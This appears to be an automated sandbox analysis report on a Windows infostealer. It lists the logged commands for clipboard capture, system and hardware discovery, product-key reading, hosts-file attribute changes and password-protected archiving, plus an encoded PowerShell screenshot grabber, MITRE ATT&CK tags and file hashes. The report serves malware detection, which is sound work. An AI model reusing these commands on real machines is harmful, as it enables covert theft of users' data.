C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- System Location Discovery: System Language Discovery
PID:4000 -
C:\Windows\SysWOW64\tree.comtree /A /F4⤵PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- System Location Discovery: System Language Discovery
PID:4964 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo4⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- System Location Discovery: System Language Discovery
PID:1344 -
C:\Windows\SysWOW64\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵
- System Location Discovery: System Language Discovery
PID:3952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- System Location Discovery: System Language Discovery
PID:4876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5ygbgce\e5ygbgce.cmdline"5⤵
- System Location Discovery: System Language Discovery
PID:964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7D6.tmp" "c:\Users\Admin\AppData\Local\Temp\e5ygbgce\CSC866E9FC6C8794252A890904B786117.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Windows\SysWOW64\tree.comtree /A /F4⤵
- System Location Discovery: System Language Discovery
PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵
- System Location Discovery: System Language Discovery
PID:1892 -
C:\Windows\SysWOW64\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Views/modifies file attributes
PID:2796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- System Location Discovery: System Language Discovery
PID:4340 -
C:\Windows\SysWOW64\tree.comtree /A /F4⤵
- System Location Discovery: System Language Discovery
PID:4592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵
- System Location Discovery: System Language Discovery
PID:4628 -
C:\Windows\SysWOW64\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2984
-
C:\Windows\SysWOW64\tree.comtree /A /F4⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- System Location Discovery: System Language Discovery
PID:4452 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- System Location Discovery: System Language Discovery
PID:5052 -
C:\Windows\SysWOW64\tree.comtree /A /F4⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\tree.comtree /A /F4⤵
- System Location Discovery: System Language Discovery
PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵
- System Location Discovery: System Language Discovery
PID:4336 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4592
-
-
C:\Windows\SysWOW64\getmac.exegetmac4⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ukF45.zip" *"3⤵
- System Location Discovery: System Language Discovery
PID:2848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI21522\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\ukF45.zip" *4⤵
- Executes dropped EXE
PID:2208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
- System Location Discovery: System Language Discovery
PID:788 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption4⤵
- System Location Discovery: System Language Discovery
PID:556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
- System Location Discovery: System Language Discovery
PID:4184 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- System Location Discovery: System Language Discovery
PID:3352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵
- System Location Discovery: System Language Discovery
PID:1424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- System Location Discovery: System Language Discovery
PID:1084 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:4896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵
- System Location Discovery: System Language Discovery
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2628
-
-
-
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3952
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD58a7f4dc1be4c3a6c3b1571a1b70bab25
SHA1f2e397961219023bb7306953bb778074968d4e97
SHA2567e425f69ce56822e7339c10674cc177a56070e46a44759ca43f2f4662295e104
SHA512766c0819cd80b8f46e796e9dc38293f1b87359cf2cde17a6f05f36c9086346b0d73f79b156ef3fba1302e5b6fb120074172064458ae5c53e49246a4024208f8f
-
Filesize
18KB
MD5af8562c8b68ea3df6baa9e01066e4bb3
SHA17db500bf6b9fc1ff3b7285e8a38b3f420cc1920c
SHA25624b7790347d1bcc0ded2b03fc415ec92739157c291a4b3ced9f57072ea218e07
SHA512b588317a7b97522518fade5846db87361a48cd63583f0cde07c759486bf14c6f2a77f70a70f0ba83420db902f7962f4b7cee9127b2c814b0381574fd837091d3
-
Filesize
18KB
MD52655251bbf0c18858e0d9818a4f235ff
SHA121f0b4c04ad95ce8fb5292c17e6a89f333364966
SHA256c07f47ab3ec7059e9d4160b534a810560a5ae0810afc1552a6da8e7a33451420
SHA512b10431986145437ef5f970528050e626b63cc87312885a3e2a13ae8a56015de683f18662160c4def6476b4d71b6cd2c0d5abb0db58f7bf313d96fb602cbe8e6e
-
Filesize
18KB
MD518f91d55d0ae362692ad177f80bc0838
SHA12b57ded818c81e58acaa4ee5effa464631212768
SHA2564d71b28130bfa01141465ab5f1de6f02495b63ce00190bf460c8bbe56eecd3a6
SHA512288208a93d9a37ad5064cbd6a21f4096f6d19c16fabeb250f913ffcde67d8c2b7948448f2227097944875ed6c0810142ed104e0f4a5e1b03fa6a17725a3bc895
-
Filesize
1KB
MD5385003fe05036055d358dbc690e6edf6
SHA1486cc2608f50a6bb69fe4b80d0186e69030d0f12
SHA2568d586a46847554614a5b35481db99e2fd00d8e6f8c3680dfad224eeca5b68f29
SHA512dc2df4f2f454fd20adbe930c06831b683066567c1430b95fbc2aae66440354923bfd92da48f71e933071f95845fbb2d8e945190719f8be7364aaa5e89768bd4b
-
Filesize
88KB
MD517f01742d17d9ffa7d8b3500978fc842
SHA12da2ff031da84ac8c2d063a964450642e849144d
SHA25670dd90f6ee01854cecf18b1b6d1dfbf30d33c5170ba07ad8b64721f0bdcc235e
SHA512c4e617cd808e48cc803343616853adf32b7f2e694b5827392219c69145a43969384d2fc67fa6fa0f5af1ca449eb4932004fbcdd394a5ba092212412b347586f0
-
Filesize
44KB
MD582f4c164e338c948b517315d5194b933
SHA1d62218d4f47ef88e78aab560931970484b534217
SHA2568a65f82a1538d9e151029932a732e547aca2d5d8da2bccef7c84e5b62baf98fc
SHA5126a95f68ff74f6b718c4ad7065743f31c4df8543334ca2290e447532f9dbe6436c50e55291af95196b1a39e4ecf5dbf0433b994da3617313be4977dd9d1fd1785
-
Filesize
52KB
MD578062d607f6f8759999a8ae8ca7fedf5
SHA1d54908788a91c8753c95a19a13574469f4296110
SHA256a269209f3e5a6d1ca0481765b0ab77411beb5926dbda278f1426888179a43ca4
SHA5123cddb271a6aa13a959dbce9b71a5910a1ac81b9c3fa5c5ec17403a47485bc13870da6a065d796bb3c15df5c25387efa3833210fc2158c28576800e7576ba73a7
-
Filesize
79KB
MD582e36397cecb977a92217336b17d078d
SHA12c78abbead98b28adf5f1a21560b225b6d2de265
SHA256315e89530838e9dddb858d9d5c661b12d69b83cb4b9f2aeb1c677514538f9948
SHA512c6f8d60ef548c299e2954905b8af8860295b2fd949ad06cdde931eee64a7f30237d5bc8c8724c95f48d88813d036829b3bc0839bcf0b6a827e0e9ecc44b5c61c
-
Filesize
30KB
MD5fb4196a7209e578cfafeb8913de1a60b
SHA1ce47ea9a41e880b745b6b7b37e901aa015cedf7b
SHA25653ad9d07293d366409e45be9911a94b0b299c352daacce3d588a8545cab240e1
SHA512a7c248252849967d09fb258be1b1bc97aaa0afb74509286d92d04a46af9fce50990353f11629eaed3733f9dea4c132f57b78ccc0fde39c3228b257176604b483
-
Filesize
79KB
MD53921aac6897309510299a012203d8966
SHA16eba3c49a11e9a4ea88bb2f6c9c27d43145657ea
SHA256ae02acbed02af84dfd675786c981270583346426efb5a738b35184885106cebc
SHA512321f913e8253d251a46786e2909ba976786527c556b9d1ef12b191e30d8fc137cbb501ee523a11bf45df18632b8b4802fa7577e870efa6c9e5b8939ce6ce818c
-
Filesize
24KB
MD50488039c09b8b091224ba32a3bb6cdc5
SHA1b63a17e4340855d76eedc4402b994a619f3e1c7e
SHA256f5b80ab216c32ce90353f86724be0d8035d2aefd7bb04cb06512091e7e940123
SHA512802b7c346adebd56cc8e077bf6fac11c8de41fc917962d5f7914e491db8eca6cb45067cf2c49db5629a29118d5721066be9f137b1790ab06a2e272a6d847a5ce
-
Filesize
38KB
MD59d79a60dfb6a3efa4de85f071b2900e0
SHA1370abc46815e55094de8ff8bacc9f67c293bf353
SHA25627eb13aa958510b2aecea6c13f0b857c3d66ee4a9905ddf37351edeb8540de3a
SHA5120497ff4e577a2743e98c112785e40b0720ac3b46cd0f2c56a33b5fc20db3120fdf810160bd034a060257e1be0097e44fc3e5d49087d7baf6c9f5a5c4b21a4685
-
Filesize
44KB
MD5cd1b0cb7b9fa52d25e45c5888ec569d5
SHA1c29ac928d225f6e9779b0f6b55b0096a89bf4160
SHA25693dc60de7986cbad17e4c0a9362b2436346a188b1d67d9b0a210a32bcd163fe6
SHA51206d3681f49bfad662e81bc1b530c09bd1e0d7cc3990bb484909d88aafc2cad190de534799f48a970af1b6c006c7f2ae8a74b1ed31cdc74d0554333b9d7278f28
-
Filesize
61KB
MD5e4471857e6b3a3eac40fa56add86c4d6
SHA10399b76dc4162e70d7d5f13ec1efab784d80d26e
SHA25602da52be242ee5da7a83e6931e06600b9396d925ad33d408045c34cec94601e5
SHA5126888ca02d3dcae265991e46e31b5318f1f827077eb6332c9a0f8358c30baac134117c476be94b174983a2f8755890d5c41ef23d1369190d4d82802f8c43a0753
-
Filesize
1.4MB
MD54074563cdd88d27fa928d5e772b94584
SHA1322ff4bc5ba07b380acac9495bb0ced23d2b97ba
SHA2565747de5fafb5f79f7e632f801ba637d5c8420a3bed2194162bcbdd16c36b12d2
SHA512b97b2b72223796dfc759ee70596922372fe9c9f212b376668f62600747013855e1406109a63205e658d5f05d5ff0b048070e81eada120958829540d8ed2ad551
-
Filesize
119KB
MD508e68ec1daed45d56e25203c32405ae4
SHA1846c32f5505929089d128efd9750fa901e349b3c
SHA256b5f2c7f5992ccb37811faca13c56ee46085bb76f86ba6abfcf49b1ade9eb65c2
SHA51258359a88dc92cf3a23bb37c9ccc0f4ce63ec73c3df15fcab9cebc89fa971981ea2215d7e8f7f343c0a5b173547542a64978ae006445e1dd0945b8dc908178049
-
Filesize
1023KB
MD5e0913019c4342cb35acadee1b68874ad
SHA122b4370a81a302b0bfea69f1bffb852840c992f3
SHA2566cd210f499098aba819fd63733eb74513c251ab96d6f6a1a25a249d6a35ba1fa
SHA5120456ca8b911bc63524e2093504c501402bd06306593a46936c9bbb0d15669f5188c251ae84cc7720f40869ad1fd9ba50e7605a8c26e9495f02fee5409dc9da5d
-
Filesize
28KB
MD550d1bacecfb4df4b7f4080803cb07e4a
SHA1e4fd81cc1de13291f5a113f386e831396d6db41d
SHA256d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f
